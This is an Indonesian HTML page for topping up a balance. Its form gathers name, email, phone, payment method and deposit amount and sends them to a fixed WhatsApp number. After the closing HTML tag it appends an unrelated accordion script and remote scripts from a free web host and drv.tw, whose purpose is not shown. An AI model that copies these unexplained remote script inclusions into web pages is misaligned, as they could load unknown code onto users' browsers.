<HTML>
<head>
<title>Deposit Via Whatsapp</title>
<style type="text/css">
body{font-family:'Roboto',Arial,sans-serif}.none{display:none}

/* Input Field CSS */
.datainput{

position:relative;
margin:5px 0 20px}

.datainput p{

font-size:12px;
background:#eee;
display:inline-block;
padding:5px 15px;
border-radius:.5rem}

.whatsapp-form textarea{
min-height:120px}

.datainput select{
padding:12px 0;
color:#555;
font-size:14px;
width:100%;
border:0;border-bottom:1px solid #000;
outline:none;
background:#fff}

.datainput input,.datainput textarea{

font-size:15px;
padding:15px 0;
display:block;
width:100%;
border:none;border-bottom:1px solid #000}

.datainput input:focus,.datainput textarea:focus{outline:none}

.datainput label{

color:#999;
font-size:14px;
font-weight:400;
position:absolute;
pointer-events:none;
left:0;top:18px;
transition:.2s ease all}

.datainput input:focus~label,.datainput input:valid~label,.datainput textarea:focus~label,.datainput textarea:valid~label{top:-10px;font-size:14px;color:#21a51f}#notif-license span{font-size:40px}#notif-license{display:none;position:fixed}.bar{position:relative;display:block;width:100%}

.bar:before,.bar:after{
content:'';
height:2px;
width:0;
bottom:1px;
position:absolute;
background: yellow;
transition:.2s ease all}

.bar:before{left:50%}

.bar:after{right:50%}

.datainput input:focus~.bar:before,.datainput input:focus~.bar:after,.datainput textarea:focus~.bar:before,.datainput textarea:focus~.bar:after{width:50%}.indigox{background:#3f51b5}

.orangex{background:#ff9800}

.pinkx{background:#e91e63}.bluex{background:#2196F3}

.purplex{background:#9c27b0}

.redx{background:#F44336}

.greenx{background:#4CAF50}

.highlight{
position:absolute;
height:50%;
width:100px;
top:25%;
left:0;
pointer-events:none;

opacity:.5}.datainput input:focus~.highlight,.datainput textarea:focus~.highlight{animation:inputHighlighter .3s ease}.datainput input:focus~label,.datainput input:valid~label,.datainput textarea:focus~label,.datainput textarea:valid~label{top:-10px;font-size:13px;color:#fff}

/* Default Whatsapp Form CSS by www.idblanter.com */
form.whatsapp-form {
    box-shadow: 0 1px 6px rgba(32,33,36,.28);
    border-radius: .5rem;
    padding: 20px;
    box-sizing: border-box;
    color: #000;
    font-size: 14px;
    line-height: 1.5;
}
 .whatsapp-form a.send_form {
    color: #000;
    background: #fffc40;
    text-decoration: none;
    display: inline-block;
    padding: 10px 25px;
    border-radius: .3rem;
    font-weight: 700;
    letter-spacing: .5px;
    font-size: 15px;
}
#text-info span {
    display: block;
    padding: 10px 15px;
    text-align: center;
    font-weight: 700;
    margin: 15px 0;
    border-radius: .5rem;
}
#text-info span.yes {
    background: #c6ffc5;
    color: #0ea904;
}
#text-info span.no {
    background: #ffc5c5;
    color: #ce0404;
}
</style>
<script src='https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script>
<link href="https://fonts.googleapis.com/css?family=Roboto&display=swap" rel="stylesheet"/>
</head>
<body>

<form class="whatsapp-form">
<div class="datainput">
<input class="validate" id="wa_name" name="name" required="" type="text" value=''/>
<span class="highlight"></span><span class="bar"></span>
<label>Nama Terdaftar</label>
</div>
<div class="datainput">
<input class="validate" id="wa_email" name="email" required="" type="email" value=''/>
<span class="highlight"></span><span class="bar"></span>
<label>Email Terdaftar</label>
</div>
<div class="datainput">
<input class="validate" id="wa_number" name="count" required="" type="number" value=''/>
<span class="highlight"></span><span class="bar"></span>
<label>Nomor Terdaftar</label>
</div>
<div class="datainput">
<select id="wa_select">
  <option hidden='hidden' selected='selected' value='default'>Pilih Metode Pembayaran</option>
  <option value="8">BRI</option>
   <option value="8">DANA</option>
  <option value="8">GOPAY</option>
  <option value="8">OVO</option>
  
   
  
</select>
</div>
<div class="datainput">
<input class="validate" id="wa_url" name="number" required="" type="number" value=''/>
<span class="highlight"></span><span class="bar"></span>
<label>Masukan Jumlah Deposit</label>
<p>Minimal Deposit Saldo Rp10.000, Bebas Biaya Admin </p>
</div>
<a class="send_form" href="javascript:void" type="submit" title="Send to Whatsapp">Send to Whatsapp</a>
<div id="text-info"></div>
</form>

<br>
<br>
<center>Deposit Via Whatsapp</center>

<script type="text/javascript">
//<![CDATA[
$(document).on('click','.send_form', function(){
var input_blanter = document.getElementById('wa_email');

/* Whatsapp Settings */
var walink = 'https://web.whatsapp.com/send',
    phone = '6283852446740',
    walink2 = '*Halo Admin, Saya ingin Topup Saldo* ',
    text_yes = 'Terkirim.',
    text_no = 'Isi semua Formulir lalu klik Send.';

/* Smartphone Support */
if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
var walink = 'whatsapp://send';
}

if("" != input_blanter.value){

 /* Call Input Form */
var input_select1 = $("#wa_select :selected").text(),
    input_name1 = $("#wa_name").val(),
    input_email1 = $("#wa_email").val(),
    input_number1 = $("#wa_number").val(),
    input_url1 = $("#wa_url").val(),
    input_textarea1 = $("#wa_textarea").val();

/* Final Whatsapp URL */
var blanter_whatsapp = walink + '?phone=' + phone + '&text=' + walink2 + '%0A%0A' +
    '*Usename* : ' + input_name1 + '%0A' +
    '*Email* : ' + input_email1 + '%0A' +
    '*Nomor* : ' + input_number1 + '%0A' +
    '*Pembayaran* : ' + input_select1 + '%0A' +
    '*Nominal* : ' + input_url1 + '%0A';

/* Whatsapp Window Open */
window.open(blanter_whatsapp,'_blank');
document.getElementById("text-info").innerHTML = '<span class="yes">'+text_yes+'</span>';
} else {
document.getElementById("text-info").innerHTML = '<span class="no">'+text_no+'</span>';
}
});
//]]>
</script>
</body>
</HTML>

   
   
   
   
   
   
    
      
  <script>
  				const accordionItemHeaders = document.querySelectorAll(".accordion-item-header");

accordionItemHeaders.forEach(accordionItemHeader => {
  accordionItemHeader.addEventListener("click", event => {
    
    // Uncomment in case you only want to allow for the display of only one collapsed item at a time!
    
    // const currentlyActiveAccordionItemHeader = document.querySelector(".accordion-item-header.active");
    // if(currentlyActiveAccordionItemHeader && currentlyActiveAccordionItemHeader!==accordionItemHeader) {
    //   currentlyActiveAccordionItemHeader.classList.toggle("active");
    //   currentlyActiveAccordionItemHeader.nextElementSibling.style.maxHeight = 0;
    // }

    accordionItemHeader.classList.toggle("active");
    const accordionItemBody = accordionItemHeader.nextElementSibling;
    if(accordionItemHeader.classList.contains("active")) {
      accordionItemBody.style.maxHeight = accordionItemBody.scrollHeight + "px";
    }
    else {
      accordionItemBody.style.maxHeight = 0;
    }
    
  });
});

  </script>
<script src="https://flamgo.000webhostapp.com/js/flam_generate.js"></script>
<script src="https://www.drv.tw/inc/wd.js?s=dslah5my8dkhmwzkmdgurg"></script></body>
</html>




